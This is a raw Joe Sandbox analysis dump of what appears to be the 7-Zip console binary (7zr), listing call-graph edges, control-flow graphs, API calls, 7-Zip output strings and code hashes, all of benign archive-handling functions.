77344->77399 77346 c82bd6 _CxxThrowException 77346->77339 77350->77339 77400 c91d73 5 API calls __EH_prolog 77350->77400 77352 c82bb8 _CxxThrowException 77352->77342 77355 c83856 __EH_prolog 77353->77355 77354 c72e04 malloc _CxxThrowException 77354->77355 77355->77354 77356 c72fec 3 API calls 77355->77356 77357 c72f88 3 API calls 77355->77357 77358 cb04d2 5 API calls 77355->77358 77360 c71e40 free ctype 77355->77360 77361 c83917 77355->77361 77402 c83b76 malloc _CxxThrowException __EH_prolog ctype 77355->77402 77356->77355 77357->77355 77358->77355 77360->77355 77361->77205 77362->77162 77363->77167 77364->77175 77365->77177 77366->77180 77367->77181 77368->77189 77369->77186 77370->77196 77371->77202 77372->77239 77373->77239 77374->77248 77375->77236 77376->77241 77377->77247 77378->77252 77379->77261 77380->77266 77381->77268 77382->77275 77383->77270 77384->77214 77385->77216 77386->77235 77387->77253 77388->77263 77389->77264 77390->77262 77391->77230 77392->77221 77393->77229 77394->77334 77395->77341 77396->77344 77397->77344 77398->77344 77399->77344 77400->77352 77401->77346 77402->77355 77404 c97f14 77403->77404 77406 c97ef7 77403->77406 77404->77287 77405 c97193 free 77405->77406 77406->77404 77406->77405 77431 c71e40 free 77406->77431 77409 c72e04 2 API calls 77408->77409 77410 c97103 77409->77410 77410->77287 77412 c97a4a __EH_prolog 77411->77412 77432 c7361b 6 API calls 2 library calls 77412->77432 77414 c97a78 77433 c7361b 6 API calls 2 library calls 77414->77433 77416 c97a83 77417 c97b20 77416->77417 77421 c72e04 malloc _CxxThrowException 77416->77421 77423 c72fec 3 API calls 77416->77423 77424 c72fec 3 API calls 77416->77424 77425 cb04d2 5 API calls 77416->77425 77428 c71e40 free ctype 77416->77428 77434 c97955 malloc _CxxThrowException __EH_prolog ctype 77416->77434 77435 ca2db9 free ctype 77417->77435 77419 c97b2b 77436 ca2db9 free ctype 77419->77436 77421->77416 77422 c97b37 77422->77287 77423->77416 77426 c97aca wcscmp 77424->77426 77425->77416 77426->77416 77428->77416 77429->77287 77430->77287 77431->77406 77432->77414 77433->77416 77434->77416 77435->77419 77436->77422 77437 cb8eb1 77442 cb8ed1 77437->77442 77440 cb8ec9 77443 cb8edb __EH_prolog 77442->77443 77451 cb9267 77443->77451 77447 cb8efd 77456 cae5f1 free ctype 77447->77456 77449 cb8eb9 77449->77440 77450 c71e40 free 77449->77450 77450->77440 77452 cb9271 __EH_prolog 77451->77452 77457 c71e40 free 77452->77457 77454 cb8ef1 77455 cb922b free CloseHandle GetLastError ctype 77454->77455 77455->77447 77456->77449 77457->77454 77458 c7c3bd 77459 c7c3ca 77458->77459 77461 c7c3db 77458->77461 77459->77461 77462 c71e40 free 77459->77462 77462->77461 77463 caadb7 77464 caadc1 __EH_prolog 77463->77464 77465 c726dd 2 API calls 77464->77465 77466 caae1d 77465->77466 77467 c72e04 2 API calls 77466->77467 77468 caae38 77467->77468 77469 c72e04 2 API calls 77468->77469 77470 caae44 77469->77470 77471 c72e04 2 API calls 77470->77471 77472 caae68 77471->77472 77473 caad29 2 API calls 77472->77473 77474 caae85 77473->77474 77479 caaf2d 77474->77479 77476 caae94 77477 c72e04 2 API calls 77476->77477 77478 caaeb2 77477->77478 77480 caaf37 __EH_prolog 77479->77480 77491 c834f4 malloc _CxxThrowException __EH_prolog 77480->77491 77482 caafac 77483 c72e04 2 API calls 77482->77483 77484 caafbb 77483->77484 77485 c72e04 2 API calls 77484->77485 77486 caafca 77485->77486 77487 c72e04 2 API calls 77486->77487 77488 caafd9 77487->77488 77489 c72e04 2 API calls 77488->77489 77490 caafe8 77489->77490 77490->77476 77491->77482 77495 ca5475 77496 c72fec 3 API calls 77495->77496 77497 ca54b4 77496->77497 77498 cac911 24 API calls 77497->77498 77499 ca54bb 77498->77499 77500 cf69f0 free
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CB81F1
                                            • Part of subcall function 00CBF749: _CxxThrowException.MSVCRT(?,00D24A58), ref: 00CBF792
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: ExceptionH_prologThrow
                                          • String ID:
                                          • API String ID: 461045715-3916222277
                                          • Opcode ID: 308a50ab7fdd2f525528cd6cd8dd3ebe4096af7d7765a10b9c2374172108c2b7
                                          • Instruction ID: 18996656fb46b47765f212205e29f8f0a4e4e874f17040b1a596461e56468d97
                                          • Opcode Fuzzy Hash: 308a50ab7fdd2f525528cd6cd8dd3ebe4096af7d7765a10b9c2374172108c2b7
                                          • Instruction Fuzzy Hash: 2E92A130900259DFDF15DFA8C884BEEBBB5BF18304F244099E815AB292CB75DE49DB61
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C7686D
                                            • Part of subcall function 00C76848: FindClose.KERNELBASE(00000000,?,00C76880), ref: 00C76853
                                          • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00C768A5
                                          • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00C768DE
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: Find$FileFirst$CloseH_prolog
                                          • String ID:
                                          • API String ID: 3371352514-0
                                          • Opcode ID: 0f2afbb2cfde72f0ebe66ca3baebe23b44a42722a3531416ed893db599fbe265
                                          • Instruction ID: d0231cf1e80842dc96f84b5eceab2a8f40c8e164a680709eec90bdd5c9a40b61
                                          • Opcode Fuzzy Hash: 0f2afbb2cfde72f0ebe66ca3baebe23b44a42722a3531416ed893db599fbe265
                                          • Instruction Fuzzy Hash: 2E11C431500609EBCF10EF64D8555EDB779EF50324F208629E9B9571D1DB318EC6EB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 caa013-caa01a 1 caa37a-caa544 call cb04d2 call c71524 call cb04d2 call c71524 call c71e0c 0->1 2 caa020-caa02d call c81ac8 0->2 64 caa551 1->64 65 caa546-caa54f call cab0fa 1->65 8 caa22e-caa235 2->8 9 caa033-caa03a 2->9 10 caa23b-caa24d call cab4f6 8->10 11 caa367-caa375 call cab55f 8->11 13 caa03c-caa042 9->13 14 caa054-caa089 call ca92d3 9->14 26 caa259-caa2fb call c97ebb call c727bb call c726dd call c93d70 call caad99 call c727bb 10->26 27 caa24f-caa253 10->27 25 caac23-caac2a 11->25 13->14 17 caa044-caa04f call c730ea 13->17 29 caa08b-caa091 14->29 30 caa099 14->30 17->14 35 caac3a-caac66 call cab96d call c71e40 call c93247 25->35 36 caac2c-caac33 25->36 91 caa2fd 26->91 92 caa303-caa362 call cab6ab call ca2db9 call c71e40 * 2 call cabff8 26->92 27->26 29->30 33 caa093-caa097 29->33 34 caa09d-caa0de call c72fec call cab369 30->34 33->34 55 caa0ea-caa0fa 34->55 56 caa0e0-caa0e4 34->56 69 caac68-caac6a 35->69 70 caac6e-caacb5 call c71e40 call c711c2 call cabe0c call ca2db9 35->70 36->35 41 caac35 36->41 42 caac35 call cab988 41->42 42->35 60 caa0fc-caa102 55->60 61 caa10d 55->61 56->55 60->61 67 caa104-caa10b 60->67 68 caa114-caa19e call c72fec call c97ebb call caad99 61->68 66 caa553-caa55c 64->66 65->66 74 caa55e-caa560 66->74 75 caa564-caa5c1 call c72fec call cab277 66->75 67->68 104 caa1a2 call c9f8e0 68->104 69->70 74->75 98 caa5cd-caa652 call caad06 call cabf3e call c83a29 call c72e04 call c94345 75->98 99 caa5c3-caa5c7 75->99 91->92 92->25 136 caa676-caa6c8 call c92096 98->136 137 caa654-caa671 call c9375c call cab96d 98->137 99->98 108 caa1a7-caa1b1 104->108 109 caa1b3-caa1bb call cac7d7 108->109 110 caa1c0-caa1c9 108->110 109->110 115 caa1cb 110->115 116 caa1d1-caa229 call cab6ab call ca2db9 call c71e40 call cabfa4 call ca940b 110->116 115->116 116->25 143 caa6cd-caa6d6 136->143 137->136 146 caa6d8-caa6dd call cac7d7 143->146 147 caa6e2-caa6e5 143->147 146->147 149 caa72e-caa73a 147->149 150 caa6e7-caa6ee 147->150 154 caa79e-caa7aa 149->154 155 caa73c-caa74a call c71fa0 149->155 152 caa722-caa725 150->152 153 caa6f0-caa71d call c71fa0 fputs call c71fa0 call c71fb3 call c71fa0 150->153 152->149 159 caa727 152->159 153->152 157 caa7d9-caa7e5 154->157 158 caa7ac-caa7b2 154->158 171 caa74c-caa753 155->171 172 caa755-caa799 fputs call c72201 call c71fa0 fputs call c72201 call c71fa0 155->172 164 caa818-caa81a 157->164 165 caa7e7-caa7ed 157->165 158->157 162 caa7b4-caa7d4 fputs call c72201 call c71fa0 158->162 159->149 162->157 166 caa899-caa8a5 164->166 169 caa81c-caa82b 164->169 165->166 167 caa7f3-caa813 fputs call c72201 call c71fa0 165->167 175 caa8e9-caa8ed 166->175 176 caa8a7-caa8ad 166->176 167->164 178 caa82d-caa84c fputs call c72201 call c71fa0 169->178 179 caa851-caa85d 169->179 171->154 171->172 172->154 183 caa8ef 175->183 188 caa8f6-caa8f8 175->188 176->183 184 caa8af-caa8c2 call c71fa0 176->184 178->179 179->166 187 caa85f-caa872 call c71fa0 179->187 183->188 184->183 208 caa8c4-caa8e4 fputs call c72201 call c71fa0 184->208 187->166 210 caa874-caa894 fputs call c72201 call c71fa0 187->210 196 caa8fe-caa90a 188->196 197 caaaaf-caaaeb call c943b3 call c71e40 call cac104 call caad82 188->197 204 caaa73-caaa89 call c71fa0 196->204 205 caa910-caa91f 196->205 246 caac0b-caac1e call ca2db9 * 2 197->246 247 caaaf1-caaaf7 197->247 204->197 224 caaa8b-caaaaa fputs call c72201 call c71fa0 204->224 205->204 206 caa925-caa929 205->206 206->197 213 caa92f-caa93d 206->213 208->175 210->166 220 caa96a-caa971 213->220 221 caa93f-caa964 fputs call c72201 call c71fa0 213->221 228 caa98f-caa9a8 fputs call c72201 220->228 229 caa973-caa97a 220->229 221->220 224->197 241 caa9ad-caa9bd call c71fa0 228->241 229->228 234 caa97c-caa982 229->234 234->228 239 caa984-caa98d 234->239 239->228 244 caaa06-caaa1f fputs call c72201 239->244 241->244 250 caa9bf-caaa01 fputs call c72201 call c71fa0 fputs call c72201 call c71fa0 241->250 252 caaa24-caaa29 call c71fa0 244->252 246->25 247->246 250->244 259 caaa2e-caaa4b fputs call c72201 252->259 263 caaa50-caaa5b call c71fa0 259->263 263->197 268 caaa5d-caaa71 call c71fa0 call ca710e 263->268 268->197
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$ExceptionThrow
                                          • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                          • API String ID: 3665150552-429544124
                                          • Opcode ID: ea44d24f4fe6c195223dcd5f77e08465ef6d734cfa4d6c4c798c946d371ef4e8
                                          • Instruction ID: 897313e0ac8c4206c8c9fd74b4b098da8b8551161f0334c2ca6762a470baa862
                                          • Opcode Fuzzy Hash: ea44d24f4fe6c195223dcd5f77e08465ef6d734cfa4d6c4c798c946d371ef4e8
                                          • Instruction Fuzzy Hash: CD528C30D00259DFCF26DBA4C985BEDBBB5AF55308F14409AE459A3292DB346F88DF21

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 274 caa42c-caa433 275 caa449-caa4df call ca545d call c72e04 call c91858 call c71e40 274->275 276 caa435-caa444 fputs call c71fa0 274->276 286 caa4ee-caa4f1 275->286 287 caa4e1-caa4e9 call cac7d7 275->287 276->275 289 caa50e-caa520 call cac73e 286->289 290 caa4f3-caa4fa 286->290 287->286 295 caac0b-caac2a call ca2db9 * 2 289->295 296 caa526-caa544 call c71e0c 289->296 290->289 291 caa4fc-caa509 call ca57fb 290->291 291->289 307 caac3a-caac66 call cab96d call c71e40 call c93247 295->307 308 caac2c-caac33 295->308 304 caa551 296->304 305 caa546-caa54f call cab0fa 296->305 306 caa553-caa55c 304->306 305->306 312 caa55e-caa560 306->312 313 caa564-caa5c1 call c72fec call cab277 306->313 327 caac68-caac6a 307->327 328 caac6e-caacb5 call c71e40 call c711c2 call cabe0c call ca2db9 307->328 308->307 314 caac35 call cab988 308->314 312->313 325 caa5cd-caa652 call caad06 call cabf3e call c83a29 call c72e04 call c94345 313->325 326 caa5c3-caa5c7 313->326 314->307 348 caa676-caa6d6 call c92096 325->348 349 caa654-caa671 call c9375c call cab96d 325->349 326->325 327->328 355 caa6d8-caa6dd call cac7d7 348->355 356 caa6e2-caa6e5 348->356 349->348 355->356 357 caa72e-caa73a 356->357 358 caa6e7-caa6ee 356->358 362 caa79e-caa7aa 357->362 363 caa73c-caa74a call c71fa0 357->363 360 caa722-caa725 358->360 361 caa6f0-caa71d call c71fa0 fputs call c71fa0 call c71fb3 call c71fa0 358->361 360->357 367 caa727 360->367 361->360 365 caa7d9-caa7e5 362->365 366 caa7ac-caa7b2 362->366 379 caa74c-caa753 363->379 380 caa755-caa799 fputs call c72201 call c71fa0 fputs call c72201 call c71fa0 363->380 372 caa818-caa81a 365->372 373 caa7e7-caa7ed 365->373 366->365 370 caa7b4-caa7d4 fputs call c72201 call c71fa0 366->370 367->357 370->365 374 caa899-caa8a5 372->374 377 caa81c-caa82b 372->377 373->374 375 caa7f3-caa813 fputs call c72201 call c71fa0 373->375 383 caa8e9-caa8ed 374->383 384 caa8a7-caa8ad 374->384 375->372 386 caa82d-caa84c fputs call c72201 call c71fa0 377->386 387 caa851-caa85d 377->387 379->362 379->380 380->362 391 caa8ef 383->391 396 caa8f6-caa8f8 383->396 384->391 392 caa8af-caa8c2 call c71fa0 384->392 386->387 387->374 395 caa85f-caa872 call c71fa0 387->395 391->396 392->391 416 caa8c4-caa8e4 fputs call c72201 call c71fa0 392->416 395->374 418 caa874-caa894 fputs call c72201 call c71fa0 395->418 404 caa8fe-caa90a 396->404 405 caaaaf-caaaeb call c943b3 call c71e40 call cac104 call caad82 396->405 412 caaa73-caaa89 call c71fa0 404->412 413 caa910-caa91f 404->413 405->295 454 caaaf1-caaaf7 405->454 412->405 432 caaa8b-caaaaa fputs call c72201 call c71fa0 412->432 413->412 414 caa925-caa929 413->414 414->405 421 caa92f-caa93d 414->421 416->383 418->374 428 caa96a-caa971 421->428 429 caa93f-caa964 fputs call c72201 call c71fa0 421->429 436 caa98f-caa9a8 fputs call c72201 428->436 437 caa973-caa97a 428->437 429->428 432->405 449 caa9ad-caa9bd call c71fa0 436->449 437->436 442 caa97c-caa982 437->442 442->436 447 caa984-caa98d 442->447 447->436 452 caaa06-caaa4b fputs call c72201 call c71fa0 fputs call c72201 447->452 449->452 457 caa9bf-caaa01 fputs call c72201 call c71fa0 fputs call c72201 call c71fa0 449->457 467 caaa50-caaa5b call c71fa0 452->467 454->295 457->452 467->405 472 caaa5d-caaa71 call c71fa0 call ca710e 467->472 472->405
                                          APIs
                                          • fputs.MSVCRT(Scanning the drive for archives:), ref: 00CAA43E
                                            • Part of subcall function 00C71FA0: fputc.MSVCRT ref: 00C71FA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputcfputs
                                          • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                          • API String ID: 269475090-3104439828
                                          • Opcode ID: 32f5157f7793821398b92cce8002f638b628499fe220a941772817cdad4e2eae
                                          • Instruction ID: fec77fd14cff59fe2a8bcb30bf5e791625bcd498b7bddebefba1ff231510c722
                                          • Opcode Fuzzy Hash: 32f5157f7793821398b92cce8002f638b628499fe220a941772817cdad4e2eae
                                          • Instruction Fuzzy Hash: A1228C30A002599FDF26DBA4C845BEDFBF1BF55308F14809AE459A3291DB356E84EF21

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 777 ca8012-ca8032 call d0fb10 780 ca8038-ca806c fputs call ca8341 777->780 781 ca8285 777->781 785 ca80c8-ca80cd 780->785 786 ca806e-ca8071 780->786 782 ca8287-ca8295 781->782 787 ca80cf-ca80d4 785->787 788 ca80d6-ca80df 785->788 789 ca808b-ca808d 786->789 790 ca8073-ca8089 fputs call c71fa0 786->790 793 ca80e2-ca8110 call ca8341 call ca8622 787->793 788->793 791 ca808f-ca8094 789->791 792 ca8096-ca809f 789->792 790->785 795 ca80a2-ca80c7 call c72e47 call ca85c6 call c71e40 791->795 792->795 804 ca811e-ca812f call ca8565 793->804 805 ca8112-ca8119 call ca831f 793->805 795->785 804->782 812 ca8135-ca813f 804->812 805->804 813 ca814d-ca815b 812->813 814 ca8141-ca8148 call ca82bb 812->814 813->782 817 ca8161-ca8164 813->817 814->813 818 ca81b6-ca81c0 817->818 819 ca8166-ca8186 817->819 820 ca8276-ca827f 818->820 821 ca81c6-ca81e1 fputs 818->821 823 ca8298-ca829d 819->823 824 ca818c-ca8196 call ca8565 819->824 820->780 820->781 821->820 827 ca81e7-ca81fb 821->827 828 ca82b1-ca82b9 SysFreeString 823->828 829 ca819b-ca819d 824->829 830 ca81fd-ca821f 827->830 831 ca8273 827->831 828->782 829->823 832 ca81a3-ca81b4 SysFreeString 829->832 834 ca829f-ca82a1 830->834 835 ca8221-ca8245 830->835 831->820 832->818 832->819 836 ca82ae 834->836 838 ca82a3-ca82ab call c7965d 835->838 839 ca8247-ca8271 call ca84a7 call c7965d SysFreeString 835->839 836->828 838->836 839->830 839->831
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CA8017
                                          • fputs.MSVCRT ref: 00CA804D
                                            • Part of subcall function 00CA8341: __EH_prolog.LIBCMT ref: 00CA8346
                                            • Part of subcall function 00CA8341: fputs.MSVCRT ref: 00CA835B
                                            • Part of subcall function 00CA8341: fputs.MSVCRT ref: 00CA8364
                                          • fputs.MSVCRT ref: 00CA807A
                                            • Part of subcall function 00C71FA0: fputc.MSVCRT ref: 00C71FA7
                                            • Part of subcall function 00C7965D: VariantClear.OLEAUT32(?), ref: 00C7967F
                                          • SysFreeString.OLEAUT32(00000000), ref: 00CA81AA
                                          • fputs.MSVCRT ref: 00CA81CD
                                          • SysFreeString.OLEAUT32(00000000), ref: 00CA8267
                                          • SysFreeString.OLEAUT32(00000000), ref: 00CA82B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                          • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                          • API String ID: 2889736305-3797937567
                                          • Opcode ID: 6310067c4f8a7bac24b2dcfc8105a068b971b2c2014fe34020527dc60b70c44c
                                          • Instruction ID: e0aabc159c344be7d5b576c68a86af51db6322ea9a235d3d850632ab575ee646
                                          • Opcode Fuzzy Hash: 6310067c4f8a7bac24b2dcfc8105a068b971b2c2014fe34020527dc60b70c44c
                                          • Instruction Fuzzy Hash: E1916871A00606EFDF14DFA4D985AEEB7B5FF49314F204129E512A7290DF70AE4ACB60

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 846 ca6766-ca6792 call d0fb10 EnterCriticalSection 849 ca67af-ca67b7 846->849 850 ca6794-ca6799 call cac7d7 846->850 852 ca67b9 call c71f91 849->852 853 ca67be-ca67c3 849->853 854 ca679e-ca67ac 850->854 852->853 856 ca67c9-ca67d5 853->856 857 ca6892-ca68a8 853->857 854->849 858 ca6817-ca682f 856->858 859 ca67d7-ca67dd 856->859 860 ca68ae-ca68b4 857->860 861 ca6941 857->861 864 ca6873-ca687b 858->864 865 ca6831-ca6842 call c71fa0 858->865 859->858 862 ca67df-ca67eb 859->862 860->861 863 ca68ba-ca68c2 860->863 866 ca6943-ca695a 861->866 867 ca67ed 862->867 868 ca67f3-ca6801 862->868 869 ca6933-ca693f call cac5cd 863->869 870 ca68c4-ca68e6 call c71fa0 fputs 863->870 864->869 872 ca6881-ca6887 864->872 865->864 883 ca6844-ca686c fputs call c72201 865->883 867->868 868->864 874 ca6803-ca6815 fputs 868->874 869->866 885 ca68fb-ca6917 call c84f2a call c71fb3 call c71e40 870->885 886 ca68e8-ca68f9 fputs 870->886 872->869 873 ca688d 872->873 879 ca692e call c71f91 873->879 880 ca686e call c71fa0 874->880 879->869 880->864 883->880 889 ca691c-ca6928 call c71fa0 885->889 886->889 889->879
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CA676B
                                          • EnterCriticalSection.KERNEL32(00D32938), ref: 00CA6781
                                          • fputs.MSVCRT ref: 00CA680B
                                          • LeaveCriticalSection.KERNEL32(00D32938), ref: 00CA6944
                                            • Part of subcall function 00CAC7D7: fputs.MSVCRT ref: 00CAC840
                                          • fputs.MSVCRT ref: 00CA6851
                                            • Part of subcall function 00C72201: fputs.MSVCRT ref: 00C7221E
                                          • fputs.MSVCRT ref: 00CA68D9
                                          • fputs.MSVCRT ref: 00CA68F6
                                            • Part of subcall function 00C71FA0: fputc.MSVCRT ref: 00C71FA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                          • String ID: v$Sub items Errors:
                                          • API String ID: 2670240366-2468115448
                                          • Opcode ID: 7d14b0767bf4039584235480d9702d69371f6a33461722d3b6ba1183dfe53742
                                          • Instruction ID: b84c5e213e4dce0693cdcec9c7daa3a8bfd09fa9c060a762de618485c67a4d85
                                          • Opcode Fuzzy Hash: 7d14b0767bf4039584235480d9702d69371f6a33461722d3b6ba1183dfe53742
                                          • Instruction Fuzzy Hash: BF51CE31540701DFCB259FB4D894AEAB7E2FF85314F58842EE5AA87261CB306D45DF60

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 898 ca6359-ca6373 call d0fb10 901 ca639e-ca63af call ca5a4d 898->901 902 ca6375-ca6385 call cac7d7 898->902 908 ca65ee-ca65f1 901->908 909 ca63b5-ca63cd 901->909 902->901 907 ca6387-ca639b 902->907 907->901 910 ca65f3-ca65fb 908->910 911 ca6624-ca663c 908->911 912 ca63cf 909->912 913 ca63d2-ca63d4 909->913 914 ca66ea call cac5cd 910->914 915 ca6601-ca6607 call ca8012 910->915 916 ca663e call c71f91 911->916 917 ca6643-ca664b 911->917 912->913 918 ca63df-ca63e7 913->918 919 ca63d6-ca63d9 913->919 929 ca66ef-ca66fd 914->929 932 ca660c-ca660e 915->932 916->917 917->914 921 ca6651-ca668f fputs call c7211a call c71fa0 call ca8685 917->921 922 ca63e9-ca63f2 call c71fa0 918->922 923 ca6411-ca6413 918->923 919->918 920 ca64b1-ca64bc call ca6700 919->920 947 ca64be-ca64c1 920->947 948 ca64c7-ca64cf 920->948 921->929 983 ca6691-ca6697 921->983 922->923 943 ca63f4-ca640c call c7210c call c71fa0 922->943 930 ca6442-ca6446 923->930 931 ca6415-ca641d 923->931 940 ca6448-ca6450 930->940 941 ca6497-ca649f 930->941 936 ca642a-ca643b 931->936 937 ca641f-ca6425 call ca6134 931->937 932->929 938 ca6614-ca661f call c71fa0 932->938 936->930 937->936 938->914 949 ca647f-ca6490 940->949 950 ca6452-ca647a fputs call c71fa0 call c71fb3 call c71fa0 940->950 941->920 944 ca64a1-ca64ac call c71fa0 call c71f91 941->944 943->923 944->920 947->948 958 ca65a2-ca65a6 947->958 951 ca64f9-ca64fb 948->951 952 ca64d1-ca64da call c71fa0 948->952 949->941 950->949 963 ca652a-ca652e 951->963 964 ca64fd-ca6505 951->964 952->951 980 ca64dc-ca64f4 call c7210c call c71fa0 952->980 966 ca65da-ca65e6 958->966 967 ca65a8-ca65b6 958->967 976 ca657f-ca6587 963->976 977 ca6530-ca6538 963->977 973 ca6512-ca6523 964->973 974 ca6507-ca650d call ca6134 964->974 966->909 970 ca65ec 966->970 978 ca65b8-ca65ca call ca6244 967->978 979 ca65d3 967->979 970->908 973->963 974->973 976->958 982 ca6589-ca6595 call c71fa0 976->982 985 ca653a-ca6562 fputs call c71fa0 call c71fb3 call c71fa0 977->985 986 ca6567-ca6578 977->986 978->979 996 ca65cc-ca65ce call c71f91 978->996 979->966 980->951 982->958 1005 ca6597-ca659d call c71f91 982->1005 991 ca6699-ca669f 983->991 992 ca66df-ca66e5 call c71f91 983->992 985->986 986->976 1000 ca66b3-ca66ce call c84f2a call c71fb3 call c71e40 991->1000 1001 ca66a1-ca66b1 fputs 991->1001 992->914 996->979 1006 ca66d3-ca66da call c71fa0 1000->1006 1001->1006 1005->958 1006->992
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CA635E
                                          • fputs.MSVCRT ref: 00CA645F
                                            • Part of subcall function 00CAC7D7: fputs.MSVCRT ref: 00CAC840
                                          • fputs.MSVCRT ref: 00CA6547
                                          • fputs.MSVCRT ref: 00CA665F
                                          • fputs.MSVCRT ref: 00CA66AE
                                            • Part of subcall function 00C71F91: fflush.MSVCRT ref: 00C71F93
                                            • Part of subcall function 00C71FB3: __EH_prolog.LIBCMT ref: 00C71FB8
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
